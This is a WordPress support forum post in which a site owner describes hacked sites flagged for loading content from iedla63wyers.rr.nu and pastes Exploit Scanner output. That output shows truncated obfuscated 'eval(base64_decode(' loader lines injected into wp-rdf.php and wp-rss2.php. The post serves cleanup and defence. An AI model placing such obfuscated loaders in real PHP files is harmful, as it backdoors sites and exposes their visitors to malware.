• jakilevy

    (@jakilevy)


    Hello –

    I have several sites that have been hacked. Some were running 3.2.1, while others were already running 3.3.1. As recommended by @janeforshort, I thought posting my trials here would be helpful not only to me, but to the community at large.

    At the moment, all sites have been upgraded to 3.3.1.

    For the purposes of dealing with 1 site at a time, I’ll start with the domain networkedcollab (dot) org/mashup – if you get a security warning when visiting, please don’t proceed (I don’t want your computer to get malware on my account)

    be warned ??

    The message I eventually get is that my site “contains content from iedla63wyers.rr.nu”
    [ screenshot : https://skitch.com/jakilevy/8gpew/screen-shot-2012-03-01-at-3.18.57-pm ]

    As mentioned above, I’ve already gone through and deleted the old wordpress files and upgraded to 3.3.1 .

    When I tried to login to the WP dashboard, it looked totally messed up –
    [ screenshot : https://skitch.com/jakilevy/8gcwd/dashboard-mashup-culture-wordpress ]

    I’ve already notified the host (Dreamhost) about this issue and already reset all my passwords (ftp and wp).

    I then installed the plugin “Exploit Scanner” as recommended by Boone Gorges (thanks @boone!) , but got the scary red malware warning screen, so instead had to upload it via FTP.

    I got a list of files to delete (which includes some theme files I’m actually using). However, I’m being told that the following files have bad code in them. Should I delete these files ?

    This is what “Exploit Scanner” tells me :

    wp-rdf.php:1
    Often used to execute malicious code
    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9z
    wp-rdf.php:1
    Used by malicious scripts to decode previously obscured data/programs
    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaX
    wp-rss2.php:1
    Often used to execute malicious code
    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9z
    wp-rss2.php:1
    Used by malicious scripts to decode previously obscured data/programs
    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaX
Viewing 5 replies - 1 through 5 (of 5 total)
Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Hacked by iedla63wyers.rr.nu’ is closed to new replies.